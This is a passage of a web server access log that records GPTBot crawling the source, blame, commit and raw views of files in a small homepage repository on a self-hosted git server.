GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/instrument.png" +[17/Feb/2026:13:04:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html" [Client 74.7.227.38] [Length 14447] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html" +[17/Feb/2026:13:04:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/reactor.png" [Client 74.7.227.38] [Length 10862] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images" +[17/Feb/2026:13:04:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/honeywell-logo.svg" [Client 74.7.227.38] [Length 9895] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/honeywell-logo.svg" +[17/Feb/2026:13:04:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/js/script.js" [Client 74.7.227.38] [Length 17063] [Gzip 8.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/js/script.js" +[17/Feb/2026:13:04:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/js/script.js" [Client 74.7.227.38] [Length 10510] [Gzip 3.78] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/js/script.js" +[17/Feb/2026:13:04:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/status.json" [Client 74.7.227.38] [Length 11048] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/status.json" +[17/Feb/2026:13:04:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/status.json" [Client 74.7.227.38] [Length 11056] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/status.json" +[17/Feb/2026:13:04:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/honeywell-logo.svg" [Client 74.7.227.38] [Length 18354] [Gzip 6.90] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/honeywell-logo.svg" +[17/Feb/2026:13:04:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/js/script.js" [Client 74.7.227.38] [Length 4668] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/js/script.js" +[17/Feb/2026:13:04:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/favicon.ico" [Client 74.7.227.38] [Length 10839] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images" +[17/Feb/2026:13:04:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/js/script.js" [Client 74.7.227.38] [Length 12766] [Gzip 4.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/js" +[17/Feb/2026:13:04:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/services" [Client 74.7.227.38] [Length 9918] [Gzip 2.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html" +[17/Feb/2026:13:04:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/components" [Client 74.7.227.38] [Length 10565] [Gzip 3.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html" +[17/Feb/2026:13:04:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html" [Client 74.7.227.38] [Length 10058] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html" +[17/Feb/2026:13:04:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/.gitignore" [Client 74.7.227.38] [Length 11455] [Gzip 3.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html" +[17/Feb/2026:13:04:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/types.ts" [Client 74.7.227.38] [Length 11482] [Gzip 3.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html" +[17/Feb/2026:13:04:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/index.tsx" [Client 74.7.227.38] [Length 11607] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html" +[17/Feb/2026:13:04:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/status.json" [Client 74.7.227.38] [Length 10313] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/status.json" +[17/Feb/2026:13:04:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/status.json" [Client 74.7.227.38] [Length 10487] [Gzip 3.78] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/status.json" +[17/Feb/2026:13:04:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/status.json" [Client 74.7.227.38] [Length 82] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/status.json" +[17/Feb/2026:13:04:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/status.json" [Client 74.7.227.38] [Length 10342] [Gzip 2.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/status.json" +[17/Feb/2026:13:04:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/vite.config.ts" [Client 74.7.227.38] [Length 11889] [Gzip 3.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html" +[17/Feb/2026:13:04:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/services" [Client 74.7.227.38] [Length 9875] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/services" +[17/Feb/2026:13:04:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/components" [Client 74.7.227.38] [Length 9870] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/components" +[17/Feb/2026:13:04:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/status.json" [Client 74.7.227.38] [Length 10352] [Gzip 2.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/status.json" +[17/Feb/2026:13:04:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/.gitignore" [Client 74.7.227.38] [Length 9865] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/.gitignore" +[17/Feb/2026:13:04:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/types.ts" [Client 74.7.227.38] [Length 9871] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/types.ts" +[17/Feb/2026:13:04:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/index.tsx" [Client 74.7.227.38] [Length 9864] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/index.tsx" +[17/Feb/2026:13:04:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/index.tsx" [Client 74.7.227.38] [Length 10826] [Gzip 3.79] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/index.tsx" +[17/Feb/2026:13:04:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/.gitignore" [Client 74.7.227.38] [Length 10729] [Gzip 4.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/.gitignore" +[17/Feb/2026:13:04:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/types.ts" [Client 74.7.227.38] [Length 10780] [Gzip 4.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/types.ts" +[17/Feb/2026:13:04:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/.gitignore" [Client 74.7.227.38] [Length 253] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/.gitignore" +[17/Feb/2026:13:04:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/types.ts" [Client 74.7.227.38] [Length 302] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/types.ts" +[17/Feb/2026:13:04:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/index.tsx" [Client 74.7.227.38] [Length 351] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/index.tsx" +[17/Feb/2026:13:04:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/vite.config.ts" [Client 74.7.227.38] [Length 11207] [Gzip 4.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/vite.config.ts" +[17/Feb/2026:13:04:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/vite.config.ts" [Client 74.7.227.38] [Length 9875] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/vite.config.ts" +[17/Feb/2026:13:04:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/vite.config.ts" [Client 74.7.227.38] [Length 580] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/vite.config.ts" +[17/Feb/2026:13:04:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/status.json" [Client 74.7.227.38] [Length 82] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/status.json" +[17/Feb/2026:13:04:52 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html" +[17/Feb/2026:13:04:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/favicon.ico" [Client 74.7.227.38] [Length 9903] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/favicon.ico" +[17/Feb/2026:13:04:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/reactor.png" [Client 74.7.227.38] [Length 9908] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/reactor.png" +[17/Feb/2026:13:04:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/favicon.ico" [Client 74.7.227.38] [Length 146722] [Gzip 20.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/favicon.ico" +[17/Feb/2026:13:05:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/reactor.png" [Client 74.7.227.38] [Length 4568343] [Gzip 12.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/reactor.png" +[17/Feb/2026:13:05:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/reactor.png" [Client 74.7.227.38] [Length 1495918] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/reactor.png" +[17/Feb/2026:13:05:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/js/script.js" [Client 74.7.227.38] [Length 1659] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/index.html" +[17/Feb/2026:13:05:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images" [Client 74.7.227.38] [Length 10381] [Gzip 3.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images" +[17/Feb/2026:13:05:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/js/script.js" [Client 74.7.227.38] [Length 10760] [Gzip 4.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/js/script.js" +[17/Feb/2026:13:05:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/favicon.ico" [Client 74.7.227.38] [Length 10838] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images" +[17/Feb/2026:13:05:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/honeywell-logo.svg" [Client 74.7.227.38] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/index.html" +[17/Feb/2026:13:05:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/honeywell-logo.svg" [Client 74.7.227.38] [Length 10885] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images" +[17/Feb/2026:13:05:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/favicon.ico" [Client 74.7.227.38] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/index.html" +[17/Feb/2026:13:05:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/js/script.js" [Client 74.7.227.38] [Length 9853] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/js/script.js" +[17/Feb/2026:13:05:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/js/script.js" [Client 74.7.227.38] [Length 10729] [Gzip 4.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/js/script.js" +[17/Feb/2026:13:05:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/index.html" [Client 74.7.227.38] [Length 31013] [Gzip 9.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html" +[17/Feb/2026:13:05:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/js/script.js" [Client 74.7.227.38] [Length 12414] [Gzip 5.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/js/script.js" +[17/Feb/2026:13:05:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/js/script.js" [Client 74.7.227.38] [Length 4668] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; 